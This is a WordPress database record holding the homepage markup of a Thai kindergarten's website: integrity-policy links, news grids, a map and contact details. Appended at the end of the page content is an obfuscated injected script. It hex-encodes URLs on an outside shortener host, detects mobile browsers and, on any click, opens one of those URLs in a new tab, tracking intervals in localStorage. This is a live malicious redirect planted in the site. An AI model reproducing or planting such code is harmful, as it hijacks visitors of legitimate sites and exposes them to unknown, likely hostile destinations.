{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:30:18','2024-08-23 07:30:18','',19,'http://watprato.ssk.in.th/?p=205',0,'revision','',0),
